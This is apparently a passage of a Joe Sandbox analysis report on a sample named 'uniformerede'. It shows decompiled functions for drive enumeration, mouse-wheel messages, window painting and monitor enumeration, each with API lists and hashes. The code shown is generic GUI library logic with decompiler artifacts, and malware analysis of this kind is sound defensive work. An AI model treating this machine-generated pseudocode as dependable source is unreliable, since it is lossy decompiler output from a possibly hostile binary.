                                                                                                                                                                                                                            0x00473fbc
                                                                                                                                                                                                                            0x00473fc4
                                                                                                                                                                                                                            0x00474043
                                                                                                                                                                                                                            0x0047404b
                                                                                                                                                                                                                            0x00473fc6
                                                                                                                                                                                                                            0x00473fc6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00473ff1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00473ff8
                                                                                                                                                                                                                            0x00473ffb
                                                                                                                                                                                                                            0x00474000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00474007
                                                                                                                                                                                                                            0x0047400a
                                                                                                                                                                                                                            0x0047400f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00474016
                                                                                                                                                                                                                            0x00474019
                                                                                                                                                                                                                            0x0047401e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00474025
                                                                                                                                                                                                                            0x00474028
                                                                                                                                                                                                                            0x0047402d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00474034
                                                                                                                                                                                                                            0x00474037
                                                                                                                                                                                                                            0x0047403c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00473fc6
                                                                                                                                                                                                                            0x00474050
                                                                                                                                                                                                                            0x00474058
                                                                                                                                                                                                                            0x00474063
                                                                                                                                                                                                                            0x00474063
                                                                                                                                                                                                                            0x00473f93
                                                                                                                                                                                                                            0x0047416a
                                                                                                                                                                                                                            0x0047416b
                                                                                                                                                                                                                            0x00474176
                                                                                                                                                                                                                            0x00474179
                                                                                                                                                                                                                            0x0047417c
                                                                                                                                                                                                                            0x0047418e

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetLogicalDrives.KERNEL32 ref: 00473F71
                                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(00000000,00000000,0047418F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00473FBC
                                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(00000000,00000000,0047418F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0047408B
                                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(00000000,00000000,00000000,0047418F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004740CB
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DriveType$DrivesLogical
                                                                                                                                                                                                                            • String ID: CD-ROM$Fixed$Invalid root path$RAM disk$Remote (network)$Removable$Unknown
                                                                                                                                                                                                                            • API String ID: 2715012092-3183225172
                                                                                                                                                                                                                            • Opcode ID: 37c26c7b6a36cc69744da4cbf0bf51d39395402c06865476361514b269898c34
                                                                                                                                                                                                                            • Instruction ID: 8332d3c0b4ea855eee04026cb9a70cd7c2c9abd5e967455e7ab158e986997913
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 37c26c7b6a36cc69744da4cbf0bf51d39395402c06865476361514b269898c34
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A2516574A041099BC700FBA1C4459FEB379EBD5314BA1C1BBE929B3741D73C9E868A1E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00407B3C Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61registryclipboardwindowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00407B3C(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr* _v8;
				struct HWND__* _t19;
				int* _t20;
				int* _t26;
				int* _t27;

				_t26 = _t20;
				_t27 = __edx;
				_v8 = __eax;
				_t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
				 *_v8 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
				 *_t27 = RegisterClipboardFormatA("MSH_WHEELSUPPORT_MSG");
				 *_t26 = RegisterClipboardFormatA("MSH_SCROLL_LINES_MSG");
				if( *_t27 == 0 || _t19 == 0) {
					 *_a8 = 0;
				} else {
					 *_a8 = SendMessageA(_t19,  *_t27, 0, 0);
				}
				if( *_t26 == 0 || _t19 == 0) {
					 *_a4 = 3;
				} else {
					 *_a4 = SendMessageA(_t19,  *_t26, 0, 0);
				}
				return _t19;
			}








                                                                                                                                                                                                                            0x00407b43
                                                                                                                                                                                                                            0x00407b45
                                                                                                                                                                                                                            0x00407b47
                                                                                                                                                                                                                            0x00407b59
                                                                                                                                                                                                                            0x00407b68
                                                                                                                                                                                                                            0x00407b74
                                                                                                                                                                                                                            0x00407b80
                                                                                                                                                                                                                            0x00407b85
                                                                                                                                                                                                                            0x00407ba4
                                                                                                                                                                                                                            0x00407b8b
                                                                                                                                                                                                                            0x00407b9b
                                                                                                                                                                                                                            0x00407b9b
                                                                                                                                                                                                                            0x00407ba9
                                                                                                                                                                                                                            0x00407bc6
                                                                                                                                                                                                                            0x00407baf
                                                                                                                                                                                                                            0x00407bbf
                                                                                                                                                                                                                            0x00407bbf
                                                                                                                                                                                                                            0x00407bd3

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ClipboardFormatRegister$MessageSend$FindWindow
                                                                                                                                                                                                                            • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                                                                                                                                                                                                            • API String ID: 1416857345-3736581797
                                                                                                                                                                                                                            • Opcode ID: a430df52fef8c432dba606b690dc2a5b7376c3b23e3569d5b0345d39821fca1a
                                                                                                                                                                                                                            • Instruction ID: 32a8b66fc92957f21ca9bbef851e7a8d2f13c74dcc19ac79790c4ff9c798c5cc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a430df52fef8c432dba606b690dc2a5b7376c3b23e3569d5b0345d39821fca1a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49112471A48301AFE310AF55CC45F66B7E8EF45754F208436B944AB3C1D6B8BD40C7AA
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00432F08 Relevance: 18.1, APIs: 12, Instructions: 142COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 57%
                                                                                                                                                                                                                            			E00432F08(void* __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct HDC__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				char _v56;
				char _v72;
				signed char _t43;
				struct HDC__* _t55;
				void* _t74;
				signed int _t77;
				int _t79;
				void* _t92;
				intOrPtr _t105;
				void* _t114;
				void* _t117;
				void* _t120;
				void* _t122;
				intOrPtr _t123;

				_t120 = _t122;
				_t123 = _t122 + 0xffffffbc;
				_t92 = __ecx;
				_v8 = __edx;
				_t114 = __eax;
				_t43 = GetWindowLongA(E00441704(_v8), 0xffffffec);
				if((_t43 & 0x00000002) == 0) {
					return _t43;
				} else {
					GetWindowRect(E00441704(_v8),  &_v44);
					OffsetRect( &_v44,  ~(_v44.left),  ~(_v44.top));
					_t55 = E00441704(_v8);
					_push(_t55);
					L00407730();
					_v12 = _t55;
					_push(_t120);
					_push(0x433063);
					_push( *[fs:edx]);
					 *[fs:edx] = _t123;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t117 = _t114;
					if(_t92 != 0) {
						_t77 = GetWindowLongA(E00441704(_v8), 0xfffffff0);
						if((_t77 & 0x00100000) != 0 && (_t77 & 0x00200000) != 0) {
							GetSystemMetrics(2);
							_t79 = GetSystemMetrics(3);
							InflateRect( &_v28, 0xfffffffe, 0xfffffffe);
							E00419804(_v28.right, _v28.bottom - _t79,  &_v72, _v28.bottom);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t117 = _t117;
							FillRect(_v12,  &_v28, GetSysColorBrush(0xf));
						}
					}
					ExcludeClipRect(_v12, _v44.left + 2, _v44.top + 2, _v44.right - 2, _v44.bottom - 2);
					E00432B40( &_v56, 2);
					E00432A94(_t117,  &_v56, _v12, 0,  &_v44);
					_pop(_t105);
					 *[fs:eax] = _t105;
					_push(0x43306a);
					_push(_v12);
					_t74 = E00441704(_v8);
					_push(_t74);
					L00407888();
					return _t74;
				}
			}





















                                                                                                                                                                                                                            0x00432f09
                                                                                                                                                                                                                            0x00432f0b
                                                                                                                                                                                                                            0x00432f11
                                                                                                                                                                                                                            0x00432f13
                                                                                                                                                                                                                            0x00432f16
                                                                                                                                                                                                                            0x00432f23
                                                                                                                                                                                                                            0x00432f2b
                                                                                                                                                                                                                            0x00433070
                                                                                                                                                                                                                            0x00432f31
                                                                                                                                                                                                                            0x00432f3e
                                                                                                                                                                                                                            0x00432f53
                                                                                                                                                                                                                            0x00432f5b
                                                                                                                                                                                                                            0x00432f60
                                                                                                                                                                                                                            0x00432f61
                                                                                                                                                                                                                            0x00432f66
                                                                                                                                                                                                                            0x00432f6b
                                                                                                                                                                                                                            0x00432f6c
                                                                                                                                                                                                                            0x00432f71
                                                                                                                                                                                                                            0x00432f74
                                                                                                                                                                                                                            0x00432f7e
                                                                                                                                                                                                                            0x00432f7f
                                                                                                                                                                                                                            0x00432f80
                                                                                                                                                                                                                            0x00432f81
                                                                                                                                                                                                                            0x00432f82
                                                                                                                                                                                                                            0x00432f85
                                                                                                                                                                                                                            0x00432f92
                                                                                                                                                                                                                            0x00432f9c
                                                                                                                                                                                                                            0x00432fa7
                                                                                                                                                                                                                            0x00432fb0
                                                                                                                                                                                                                            0x00432fbf
                                                                                                                                                                                                                            0x00432fd9
                                                                                                                                                                                                                            0x00432fe5
                                                                                                                                                                                                                            0x00432fe6
                                                                                                                                                                                                                            0x00432fe7
                                                                                                                                                                                                                            0x00432fe8
                                                                                                                                                                                                                            0x00432fe9
                                                                                                                                                                                                                            0x00432ffa
                                                                                                                                                                                                                            0x00432ffa
                                                                                                                                                                                                                            0x00432f9c
                                                                                                                                                                                                                            0x0043301f
                                                                                                                                                                                                                            0x0043302b
                                                                                                                                                                                                                            0x0043303e
                                                                                                                                                                                                                            0x00433045
                                                                                                                                                                                                                            0x00433048
                                                                                                                                                                                                                            0x0043304b
                                                                                                                                                                                                                            0x00433053
                                                                                                                                                                                                                            0x00433057
                                                                                                                                                                                                                            0x0043305c
                                                                                                                                                                                                                            0x0043305d
                                                                                                                                                                                                                            0x00433062
                                                                                                                                                                                                                            0x00433062

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetWindowLongA.USER32 ref: 00432F23
                                                                                                                                                                                                                            • GetWindowRect.USER32 ref: 00432F3E
                                                                                                                                                                                                                            • OffsetRect.USER32(?,?,?), ref: 00432F53
                                                                                                                                                                                                                            • 73C9B080.USER32(00000000,?,?,?,00000000,?,00000000,000000EC), ref: 00432F61
                                                                                                                                                                                                                            • GetWindowLongA.USER32 ref: 00432F92
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 00432FA7
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 00432FB0
                                                                                                                                                                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 00432FBF
                                                                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00432FEC
                                                                                                                                                                                                                            • FillRect.USER32 ref: 00432FFA
                                                                                                                                                                                                                            • ExcludeClipRect.GDI32(?,?,?,?,?,00000000,00433063,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0043301F
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,?,0043306A,?,?,00000000,00433063,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0043305D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Rect$Window$LongMetricsSystem$B080B380BrushClipColorExcludeFillInflateOffset
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3936689491-0
                                                                                                                                                                                                                            • Opcode ID: 1044420493868e0b4b43c14135ea523b993d5beeeaccf79545e6cca688bac7b0
                                                                                                                                                                                                                            • Instruction ID: 04c1fd49532e7d442bf35e743343acee4fdea8649fd85b2f3a22c1a56fe95c6f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1044420493868e0b4b43c14135ea523b993d5beeeaccf79545e6cca688bac7b0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A9415E71E04108ABDB01EAE9CD82EDFB7BDEF49364F100126F904F7291CA78AE418765
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0042CAA8 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                                                            			E0042CAA8(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
				struct tagPOINT _v12;
				int _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t60;
				int _t61;
				RECT* _t64;
				struct HDC__* _t65;

				_t64 = _a8;
				_t65 = _a4;
				if( *0x49e92f != 0) {
					_t61 = 0;
					if(_a12 == 0) {
						L14:
						return _t61;
					}
					_v32.left = 0;
					_v32.top = 0;
					_v32.right = GetSystemMetrics(0);
					_v32.bottom = GetSystemMetrics(1);
					if(_t65 == 0) {
						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
							L13:
							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
						} else {
							_t61 = 1;
						}
						goto L14;
					}
					_v16 = GetClipBox(_t65,  &_v48);
					if(GetDCOrgEx(_t65,  &_v12) == 0) {
						goto L14;
					}
					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
							goto L13;
						}
						if(_v16 == 1) {
							_t61 = 1;
						}
						goto L14;
					} else {
						goto L13;
					}
				}
				 *0x49e91c = E0042C4FC(7, _t60,  *0x49e91c, _t64, _t65);
				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
				goto L14;
			}















                                                                                                                                                                                                                            0x0042cab1
                                                                                                                                                                                                                            0x0042cab4
                                                                                                                                                                                                                            0x0042cabe
                                                                                                                                                                                                                            0x0042caee
                                                                                                                                                                                                                            0x0042caf4
                                                                                                                                                                                                                            0x0042cbb0
                                                                                                                                                                                                                            0x0042cbb8
                                                                                                                                                                                                                            0x0042cbb8
                                                                                                                                                                                                                            0x0042cafc
                                                                                                                                                                                                                            0x0042cb01
                                                                                                                                                                                                                            0x0042cb0c
                                                                                                                                                                                                                            0x0042cb17
                                                                                                                                                                                                                            0x0042cb1c
                                                                                                                                                                                                                            0x0042cb85
                                                                                                                                                                                                                            0x0042cb9d
                                                                                                                                                                                                                            0x0042cbae
                                                                                                                                                                                                                            0x0042cb99
                                                                                                                                                                                                                            0x0042cb99
                                                                                                                                                                                                                            0x0042cb99
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042cb85
                                                                                                                                                                                                                            0x0042cb28
                                                                                                                                                                                                                            0x0042cb37
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042cb49
                                                                                                                                                                                                                            0x0042cb61
                                                                                                                                                                                                                            0x0042cb77
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042cb7d
                                                                                                                                                                                                                            0x0042cb7f
                                                                                                                                                                                                                            0x0042cb7f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042cb61
                                                                                                                                                                                                                            0x0042cad2
                                                                                                                                                                                                                            0x0042cae7
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • EnumDisplayMonitors.USER32(?,?,?,?), ref: 0042CAE1
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042CB06
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042CB11
                                                                                                                                                                                                                            • GetClipBox.GDI32(?,?), ref: 0042CB23
                                                                                                                                                                                                                            • GetDCOrgEx.GDI32(?,?), ref: 0042CB30
                                                                                                                                                                                                                            • OffsetRect.USER32(?,?,?), ref: 0042CB49
                                                                                                                                                                                                                            • IntersectRect.USER32 ref: 0042CB5A
                                                                                                                                                                                                                            • IntersectRect.USER32 ref: 0042CB70
                                                                                                                                                                                                                              • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(74690000,00000000), ref: 0042C57C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
                                                                                                                                                                                                                            • String ID: EnumDisplayMonitors
                                                                                                                                                                                                                            • API String ID: 362875416-2491903729
                                                                                                                                                                                                                            • Opcode ID: 791a3b08cf1bf35bfa2ae10ab843e66c4762703426140a8de13650c17db2e41e
                                                                                                                                                                                                                            • Instruction ID: 4511490224432de624573bc09b14fa9d255139f998f9dfe8687c617b2a51fe57
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 791a3b08cf1bf35bfa2ae10ab843e66c4762703426140a8de13650c17db2e41e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 723101B2E04219AFDB50DFA5E885EFF77BCAB05300F444537ED15E3241D638AA018BA9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0043F894 Relevance: 16.6, APIs: 11, Instructions: 133COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                                                                                            			E0043F894(intOrPtr* __eax, void* __edx) {
				struct HDC__* _v8;
				void* _v12;
				void* _v16;
				struct tagPAINTSTRUCT _v80;
				intOrPtr _v84;
				void* _v96;
				struct HDC__* _v104;
				void* _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t38;
				struct HDC__* _t47;
				struct HDC__* _t55;
				intOrPtr* _t83;
				intOrPtr _t102;
				void* _t103;
				void* _t108;
				void* _t111;
				void* _t113;
				intOrPtr _t114;

				_t111 = _t113;
				_t114 = _t113 + 0xffffff94;
				_push(_t103);
				_t108 = __edx;
				_t83 = __eax;
				if( *((char*)(__eax + 0x1f8)) == 0 ||  *((intOrPtr*)(__edx + 4)) != 0) {
					if(( *(_t83 + 0x55) & 0x00000001) != 0 || E0043E434(_t83) != 0) {
						_t38 = E0043F3B8(_t83, _t83, _t108, _t103, _t108);
					} else {
						_t38 =  *((intOrPtr*)( *_t83 - 0x10))();
					}
					return _t38;
				} else {
					L00407638();
					 *((intOrPtr*)( *__eax + 0x44))();
					 *((intOrPtr*)( *__eax + 0x44))();
					_t47 = _v104;
					L004072D8();
					_v12 = _t47;
					L00407888();
					L004072E0();
					_v8 = _t47;
					_v16 = SelectObject(_v8, _v12);
					 *[fs:eax] = _t114;
					_t55 = BeginPaint(E00441704(_t83),  &_v80);
					E0043C130(_t83, _v8, 0x14, _v8);
					 *((intOrPtr*)(_t108 + 4)) = _v8;
					E0043F894(_t83, _t108);
					 *((intOrPtr*)(_t108 + 4)) = 0;
					 *((intOrPtr*)( *_t83 + 0x44))(_v8, 0, 0, 0xcc0020,  *[fs:eax], 0x43f9e6, _t111, 0, 0, __eax, __eax, _t47, _v84, 0);
					 *((intOrPtr*)( *_t83 + 0x44))(_v84);
					_push(_v104);
					_push(0);
					_push(0);
					L004072B8();
					EndPaint(E00441704(_t83),  &_v80);
					_t102 = _t55;
					 *[fs:eax] = _t102;
					_push(0x43f9ed);
					SelectObject(_v8, _v16);
					DeleteDC(_v8);
					return DeleteObject(_v12);
				}
			}

























                                                                                                                                                                                                                            0x0043f895
                                                                                                                                                                                                                            0x0043f897
                                                                                                                                                                                                                            0x0043f89c
                                                                                                                                                                                                                            0x0043f89d
                                                                                                                                                                                                                            0x0043f89f
                                                                                                                                                                                                                            0x0043f8a8
                                                                                                                                                                                                                            0x0043f8b4
                                                                                                                                                                                                                            0x0043f8d3
                                                                                                                                                                                                                            0x0043f8c1
                                                                                                                                                                                                                            0x0043f8c7
                                                                                                                                                                                                                            0x0043f8c7
                                                                                                                                                                                                                            0x0043f9f3
                                                                                                                                                                                                                            0x0043f8dd
                                                                                                                                                                                                                            0x0043f8df
                                                                                                                                                                                                                            0x0043f8ed
                                                                                                                                                                                                                            0x0043f8fb
                                                                                                                                                                                                                            0x0043f8fe
                                                                                                                                                                                                                            0x0043f903
                                                                                                                                                                                                                            0x0043f908
                                                                                                                                                                                                                            0x0043f90e
                                                                                                                                                                                                                            0x0043f915
                                                                                                                                                                                                                            0x0043f91a
                                                                                                                                                                                                                            0x0043f92a
                                                                                                                                                                                                                            0x0043f938
                                                                                                                                                                                                                            0x0043f947
                                                                                                                                                                                                                            0x0043f95c
                                                                                                                                                                                                                            0x0043f964
                                                                                                                                                                                                                            0x0043f96b
                                                                                                                                                                                                                            0x0043f972
                                                                                                                                                                                                                            0x0043f989
                                                                                                                                                                                                                            0x0043f997
                                                                                                                                                                                                                            0x0043f99d
                                                                                                                                                                                                                            0x0043f99e
                                                                                                                                                                                                                            0x0043f9a0
                                                                                                                                                                                                                            0x0043f9a3
                                                                                                                                                                                                                            0x0043f9b4
                                                                                                                                                                                                                            0x0043f9bb
                                                                                                                                                                                                                            0x0043f9be
                                                                                                                                                                                                                            0x0043f9c1
                                                                                                                                                                                                                            0x0043f9ce
                                                                                                                                                                                                                            0x0043f9d7
                                                                                                                                                                                                                            0x0043f9e5
                                                                                                                                                                                                                            0x0043f9e5

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000), ref: 0043F8DF
                                                                                                                                                                                                                            • 73C9A520.GDI32(00000000,?), ref: 0043F903
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,00000000,?), ref: 0043F90E
                                                                                                                                                                                                                            • 73C9A590.GDI32(00000000,00000000,00000000,00000000,?), ref: 0043F915
                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 0043F925
                                                                                                                                                                                                                            • BeginPaint.USER32(00000000,?,00000000,0043F9E6,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0043F947
                                                                                                                                                                                                                            • 73CA97E0.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0043F9A3
                                                                                                                                                                                                                            • EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0043F9B4
                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 0043F9CE
                                                                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 0043F9D7
                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0043F9E0
                                                                                                                                                                                                                              • Part of subcall function 0043F3B8: BeginPaint.USER32(00000000,?), ref: 0043F3DE
                                                                                                                                                                                                                              • Part of subcall function 0043F3B8: EndPaint.USER32(00000000,?,0043F4DF), ref: 0043F4D2
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Paint$Object$BeginDeleteSelect$A520A590B380
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2363126454-0
                                                                                                                                                                                                                            • Opcode ID: a75929b2bda56c519e6b116cba9f63e1956fe41b6023f287faae0ba4c9e6ea03
                                                                                                                                                                                                                            • Instruction ID: 40ca658292be7ca8ad05904ab100b4ae2c2721b91c2ab7ac5fced72403dc647e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a75929b2bda56c519e6b116cba9f63e1956fe41b6023f287faae0ba4c9e6ea03
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14414E71F04204AFD704EBA9CD85B9EB7F8AF48304F50447AF909EB281DA78AD09CB55
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00402A1C Relevance: 16.6, APIs: 9, Strings: 2, Instructions: 109COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00402A1C(CHAR* __eax, intOrPtr* __edx) {
				char _t5;
				char _t6;
				CHAR* _t7;
				char _t9;
				CHAR* _t11;
				char _t14;
				CHAR* _t15;
				char _t17;
				CHAR* _t19;
				CHAR* _t22;
				CHAR* _t23;
				CHAR* _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				void* _t35;
				void* _t36;

				_t34 = __edx;
				_t22 = __eax;
				while(1) {
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L4:
					if( *_t22 != 0x22 || _t22[1] != 0x22) {
						_t36 = 0;
						_t32 = _t22;
						while(1) {
							_t6 =  *_t22;
